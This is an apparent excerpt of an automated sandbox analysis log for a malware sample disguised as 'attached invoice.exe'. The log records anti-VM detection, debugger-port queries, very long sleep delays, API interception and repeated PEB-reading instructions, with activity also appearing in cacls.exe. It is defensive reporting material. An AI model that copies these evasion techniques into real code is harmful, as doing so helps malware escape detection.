                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: attached invoice.exe PID: 4584, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\attached invoice.exeAPI/Special instruction interceptor: Address: 7FFBB106D144
                Source: C:\Users\user\Desktop\attached invoice.exeAPI/Special instruction interceptor: Address: 7FFBB1070594
                Source: C:\Users\user\Desktop\attached invoice.exeAPI/Special instruction interceptor: Address: 7FFBB106FF74
                Source: C:\Users\user\Desktop\attached invoice.exeAPI/Special instruction interceptor: Address: 7FFBB106D6C4
                Source: C:\Users\user\Desktop\attached invoice.exeAPI/Special instruction interceptor: Address: 7FFBB106D864
                Source: C:\Users\user\Desktop\attached invoice.exeAPI/Special instruction interceptor: Address: 7FFBB106D004
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D144
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB1070594
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D764
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D364
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D004
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106FF74
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D6C4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D864
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFBB106D604
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 2E40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 5010000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 8070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 81E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeMemory allocated: 91E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192088E rdtsc 4_2_0192088E
                Source: C:\Users\user\Desktop\attached invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 9445Jump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeAPI coverage: 0.9 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 1.2 %
                Source: C:\Users\user\Desktop\attached invoice.exe TID: 3628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 6320Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 5692Thread sleep count: 121 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 5692Thread sleep time: -242000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 5692Thread sleep count: 9445 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 5692Thread sleep time: -18890000s >= -30000sJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\attached invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: RAVCpl64.exe, 00000005.00000002.816280183207.00000000005BA000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815525437052.00000000027D1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.812028707731.0000014045F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\attached invoice.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0192088E rdtsc 4_2_0192088E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_00417E43 LdrLoadDll,4_2_00417E43
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E4180 mov eax, dword ptr fs:[00000030h]4_2_018E4180
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E4180 mov eax, dword ptr fs:[00000030h]4_2_018E4180
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E4180 mov eax, dword ptr fs:[00000030h]4_2_018E4180
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019141BB mov ecx, dword ptr fs:[00000030h]4_2_019141BB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019141BB mov eax, dword ptr fs:[00000030h]4_2_019141BB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019141BB mov eax, dword ptr fs:[00000030h]4_2_019141BB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E1A4 mov eax, dword ptr fs:[00000030h]4_2_0191E1A4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E1A4 mov eax, dword ptr fs:[00000030h]4_2_0191E1A4
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F01C0 mov eax, dword ptr fs:[00000030h]4_2_018F01C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F01C0 mov eax, dword ptr fs:[00000030h]4_2_018F01C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D81EB mov eax, dword ptr fs:[00000030h]4_2_018D81EB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA1E3 mov eax, dword ptr fs:[00000030h]4_2_018EA1E3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA1E3 mov eax, dword ptr fs:[00000030h]4_2_018EA1E3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA1E3 mov eax, dword ptr fs:[00000030h]4_2_018EA1E3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA1E3 mov eax, dword ptr fs:[00000030h]4_2_018EA1E3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA1E3 mov eax, dword ptr fs:[00000030h]4_2_018EA1E3
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A81EE mov eax, dword ptr fs:[00000030h]4_2_019A81EE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019A81EE mov eax, dword ptr fs:[00000030h]4_2_019A81EE
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F01F1 mov eax, dword ptr fs:[00000030h]4_2_018F01F1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F01F1 mov eax, dword ptr fs:[00000030h]4_2_018F01F1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F01F1 mov eax, dword ptr fs:[00000030h]4_2_018F01F1
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01910118 mov eax, dword ptr fs:[00000030h]4_2_01910118
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196A130 mov eax, dword ptr fs:[00000030h]4_2_0196A130
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DA147 mov eax, dword ptr fs:[00000030h]4_2_018DA147
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DA147 mov eax, dword ptr fs:[00000030h]4_2_018DA147
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DA147 mov eax, dword ptr fs:[00000030h]4_2_018DA147
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191415F mov eax, dword ptr fs:[00000030h]4_2_0191415F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6179 mov eax, dword ptr fs:[00000030h]4_2_018E6179
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01976090 mov eax, dword ptr fs:[00000030h]4_2_01976090
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019B4080 mov eax, dword ptr fs:[00000030h]4_2_019B4080
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DC090 mov eax, dword ptr fs:[00000030h]4_2_018DC090
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DA093 mov ecx, dword ptr fs:[00000030h]4_2_018DA093
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019660A0 mov eax, dword ptr fs:[00000030h]4_2_019660A0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019200A5 mov eax, dword ptr fs:[00000030h]4_2_019200A5
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C0E0 mov ecx, dword ptr fs:[00000030h]4_2_0196C0E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DC0F6 mov eax, dword ptr fs:[00000030h]4_2_018DC0F6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922010 mov ecx, dword ptr fs:[00000030h]4_2_01922010
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E8009 mov eax, dword ptr fs:[00000030h]4_2_018E8009
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01910044 mov eax, dword ptr fs:[00000030h]4_2_01910044
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01966040 mov eax, dword ptr fs:[00000030h]4_2_01966040
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6074 mov eax, dword ptr fs:[00000030h]4_2_018E6074
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E6074 mov eax, dword ptr fs:[00000030h]4_2_018E6074
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190A390 mov eax, dword ptr fs:[00000030h]4_2_0190A390
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190A390 mov eax, dword ptr fs:[00000030h]4_2_0190A390
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190A390 mov eax, dword ptr fs:[00000030h]4_2_0190A390
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019843BA mov eax, dword ptr fs:[00000030h]4_2_019843BA
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019843BA mov eax, dword ptr fs:[00000030h]4_2_019843BA
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195C3B0 mov eax, dword ptr fs:[00000030h]4_2_0195C3B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019143D0 mov ecx, dword ptr fs:[00000030h]4_2_019143D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019643D5 mov eax, dword ptr fs:[00000030h]4_2_019643D5
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E63CB mov eax, dword ptr fs:[00000030h]4_2_018E63CB
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DC3C7 mov eax, dword ptr fs:[00000030h]4_2_018DC3C7
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196E3DD mov eax, dword ptr fs:[00000030h]4_2_0196E3DD
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DE3C0 mov eax, dword ptr fs:[00000030h]4_2_018DE3C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DE3C0 mov eax, dword ptr fs:[00000030h]4_2_018DE3C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DE3C0 mov eax, dword ptr fs:[00000030h]4_2_018DE3C0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191631F mov eax, dword ptr fs:[00000030h]4_2_0191631F
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0198630E mov eax, dword ptr fs:[00000030h]4_2_0198630E
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FE310 mov eax, dword ptr fs:[00000030h]4_2_018FE310
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FE310 mov eax, dword ptr fs:[00000030h]4_2_018FE310
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018FE310 mov eax, dword ptr fs:[00000030h]4_2_018FE310
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DE328 mov eax, dword ptr fs:[00000030h]4_2_018DE328
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DE328 mov eax, dword ptr fs:[00000030h]4_2_018DE328
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DE328 mov eax, dword ptr fs:[00000030h]4_2_018DE328
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01918322 mov eax, dword ptr fs:[00000030h]4_2_01918322
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01918322 mov eax, dword ptr fs:[00000030h]4_2_01918322
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01918322 mov eax, dword ptr fs:[00000030h]4_2_01918322
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A350 mov eax, dword ptr fs:[00000030h]4_2_0191A350
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D8347 mov eax, dword ptr fs:[00000030h]4_2_018D8347
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D8347 mov eax, dword ptr fs:[00000030h]4_2_018D8347
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D8347 mov eax, dword ptr fs:[00000030h]4_2_018D8347
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E372 mov eax, dword ptr fs:[00000030h]4_2_0195E372
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E372 mov eax, dword ptr fs:[00000030h]4_2_0195E372
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E372 mov eax, dword ptr fs:[00000030h]4_2_0195E372
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E372 mov eax, dword ptr fs:[00000030h]4_2_0195E372
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960371 mov eax, dword ptr fs:[00000030h]4_2_01960371
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960371 mov eax, dword ptr fs:[00000030h]4_2_01960371
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190237A mov eax, dword ptr fs:[00000030h]4_2_0190237A
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191E363 mov eax, dword ptr fs:[00000030h]4_2_0191E363
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E289 mov eax, dword ptr fs:[00000030h]4_2_0195E289
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DC2B0 mov ecx, dword ptr fs:[00000030h]4_2_018DC2B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019042AF mov eax, dword ptr fs:[00000030h]4_2_019042AF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019042AF mov eax, dword ptr fs:[00000030h]4_2_019042AF
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA2E0 mov eax, dword ptr fs:[00000030h]4_2_018EA2E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA2E0 mov eax, dword ptr fs:[00000030h]4_2_018EA2E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA2E0 mov eax, dword ptr fs:[00000030h]4_2_018EA2E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA2E0 mov eax, dword ptr fs:[00000030h]4_2_018EA2E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA2E0 mov eax, dword ptr fs:[00000030h]4_2_018EA2E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018EA2E0 mov eax, dword ptr fs:[00000030h]4_2_018EA2E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E82E0 mov eax, dword ptr fs:[00000030h]4_2_018E82E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E82E0 mov eax, dword ptr fs:[00000030h]4_2_018E82E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E82E0 mov eax, dword ptr fs:[00000030h]4_2_018E82E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E82E0 mov eax, dword ptr fs:[00000030h]4_2_018E82E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F02F9 mov eax, dword ptr fs:[00000030h]4_2_018F02F9
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018DA200 mov eax, dword ptr fs:[00000030h]4_2_018DA200
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018D821B mov eax, dword ptr fs:[00000030h]4_2_018D821B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01900230 mov ecx, dword ptr fs:[00000030h]4_2_01900230
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960227 mov eax, dword ptr fs:[00000030h]4_2_01960227
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960227 mov eax, dword ptr fs:[00000030h]4_2_01960227
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01960227 mov eax, dword ptr fs:[00000030h]4_2_01960227
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A22B mov eax, dword ptr fs:[00000030h]4_2_0191A22B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A22B mov eax, dword ptr fs:[00000030h]4_2_0191A22B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A22B mov eax, dword ptr fs:[00000030h]4_2_0191A22B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C592 mov eax, dword ptr fs:[00000030h]4_2_0196C592
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01912594 mov eax, dword ptr fs:[00000030h]4_2_01912594
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A580 mov eax, dword ptr fs:[00000030h]4_2_0191A580
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A580 mov eax, dword ptr fs:[00000030h]4_2_0191A580
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E588 mov eax, dword ptr fs:[00000030h]4_2_0195E588
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0195E588 mov eax, dword ptr fs:[00000030h]4_2_0195E588
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019685AA mov eax, dword ptr fs:[00000030h]4_2_019685AA
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E45B0 mov eax, dword ptr fs:[00000030h]4_2_018E45B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E45B0 mov eax, dword ptr fs:[00000030h]4_2_018E45B0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019165D0 mov eax, dword ptr fs:[00000030h]4_2_019165D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019605C6 mov eax, dword ptr fs:[00000030h]4_2_019605C6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C5C6 mov eax, dword ptr fs:[00000030h]4_2_0191C5C6
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C5FC mov eax, dword ptr fs:[00000030h]4_2_0196C5FC
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A5E7 mov ebx, dword ptr fs:[00000030h]4_2_0191A5E7
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191A5E7 mov eax, dword ptr fs:[00000030h]4_2_0191A5E7
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0196C51D mov eax, dword ptr fs:[00000030h]4_2_0196C51D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018E2500 mov eax, dword ptr fs:[00000030h]4_2_018E2500
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0190E507 mov eax, dword ptr fs:[00000030h]4_2_0190E507
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C50D mov eax, dword ptr fs:[00000030h]4_2_0191C50D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0191C50D mov eax, dword ptr fs:[00000030h]4_2_0191C50D
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_018F252B mov eax, dword ptr fs:[00000030h]4_2_018F252B
